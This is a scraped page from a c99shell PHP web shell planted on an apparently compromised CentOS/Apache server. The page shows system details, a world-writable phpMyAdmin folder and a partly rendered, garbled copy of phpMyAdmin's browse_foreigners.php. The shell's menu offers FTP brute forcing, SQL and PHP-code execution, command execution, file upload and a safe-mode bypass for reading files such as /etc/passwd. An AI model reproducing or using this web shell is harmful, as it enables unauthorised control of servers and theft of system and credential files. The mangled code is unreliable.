!c99Shell v. 1.0 pre-release build #16!

Software: Apache/2.2.3 (CentOS). PHP/5.1.6 

uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44
EDT 2010 i686 

uid=48(apache) gid=48(apache) groups=48(apache) 

Safe-mode: OFF (not secure)

/var/www/html/phpMyAdmin/   drwxrwxrwx
Free 52.61 GB of 127.8 GB (41.16%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     browse_foreigners.php (10.64 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |


     $per_page) ) {
        $showall = '';
    }

    $session_max_rows = $per_page;
    $pageNow = @floor($pos / $session_max_rows) + 1;
    $nbTotalPage = @ceil($count / $session_max_rows);

    if ( $count > $per_page ) {
        $gotopage = PMA_pageselector(
                      'browse_foreigners.php?field='    . urlencode($field) .
                                       '&'          . PMA_generate_common_url($db, $table)
                                                        . $pk_uri .
                                       '&fieldkey=' . (isset($fieldkey) ? $fieldkey : '') .
                                       '&foreign_filter=' . (isset($foreign_filter) ? htmlspecialchars($foreign_filter) : '') .
                                       '&',
                      $session_max_rows,
                      $pageNow,
                      $nbTotalPage
                    );
    }
}
?>




    phpMyAdmin
    
    
    
    















    
    
    


    


    






';

    echo '' . $header . '' . "\n"
        .'' . $header . '' . "\n"
        .'' . "\n";

    $values = array();
    $keys   = array();
    foreach ( $disp_row as $relrow ) {
        if ($foreign_display != FALSE) {
            $values[] = $relrow[$foreign_display];
        } else {
            $values[] = '';
        }

        $keys[] = $relrow[$foreign_field];
    }

    asort( $keys );

    $hcount = 0;
    $odd_row = true;
    $val_ordered_current_row = 0;
    $val_ordered_current_equals_data = false;
    $key_ordered_current_equals_data = false;
    foreach ( $keys as $key_ordered_current_row => $value ) {
    //for ( $i = 0; $i < $count; $i++ ) {
        $hcount++;

        if ($cfg['RepeatCells'] > 0 && $hcount > $cfg['RepeatCells']) {
            echo $header;
            $hcount = 0;
            $odd_row = true;
        }

        $key_ordered_current_key = $keys[$key_ordered_current_row];
        $key_ordered_current_val = $values[$key_ordered_current_row];

        $val_ordered_current_key = $keys[$val_ordered_current_row];
        $val_ordered_current_val = $values[$val_ordered_current_row];

        $val_ordered_current_row++;

        if (PMA_strlen( $val_ordered_current_val ) <= $cfg['LimitChars']) {
            $val_ordered_current_val = htmlspecialchars($val_ordered_current_val);
            $val_ordered_current_val_title = '';
        } else {
            $val_ordered_current_val_title =
                htmlspecialchars( $val_ordered_current_val );
            $val_ordered_current_val =
                htmlspecialchars( PMA_substr( $val_ordered_current_val, 0,
                    $cfg['LimitChars'] ) . '...' );
        }
        if (PMA_strlen( $key_ordered_current_val ) <= $cfg['LimitChars']) {
            $key_ordered_current_val = htmlspecialchars($key_ordered_current_val);
            $key_ordered_current_val_title = '';
        } else {
            $key_ordered_current_val_title =
                htmlspecialchars( $key_ordered_current_val );
            $key_ordered_current_val =
                htmlspecialchars( PMA_substr( $key_ordered_current_val, 0,
                    $cfg['LimitChars'] ) . '...' );
        }

        if ( ! empty( $data ) ) {
            $val_ordered_current_equals_data = $val_ordered_current_key == $data;
            $key_ordered_current_equals_data = $key_ordered_current_key == $data;
        }

        ?>
    


        
' . $strKeyname . '
        ' . $strDescription . '
        
        ' . $strDescription . '
        ' . $strKeyname . '
    

        
        ' : '')
            .''
            .htmlspecialchars($key_ordered_current_key) . '' . ($key_ordered_current_equals_data ? '' : '');
        ?>
        
        ' : '')
            . ''
            . $key_ordered_current_val . '' . ($key_ordered_current_equals_data ? '' : '');
        ?>
        
            

        
        ' : '')
            . ''
            . $val_ordered_current_val . '' . ($val_ordered_current_equals_data ? '' : '');
        ?>
        
        ' : '') . '' . htmlspecialchars($val_ordered_current_key)
        . '' . ($val_ordered_current_equals_data ? '' : '');
        ?>
    

        









bool(false)

:: Command execute ::

Enter:
 
Select:
 

:: Shadow's tricks :D ::

Useful Commands
 
Warning. Kernel may be alerted using higher levels
Kernel Info:

:: Preddy's tricks :D ::

Php Safe-Mode Bypass (Read Files)

File:

eg: /etc/passwd
Php Safe-Mode Bypass (List Directories):

Dir:

eg: /etc/

:: Search ::
  - regexp 
:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c999shell v. 1.0 pre-release build #16 Modded by Shadow & Preddy | RootShell Security Group | r57 c99 shell | Generation time: 0.0053 ]--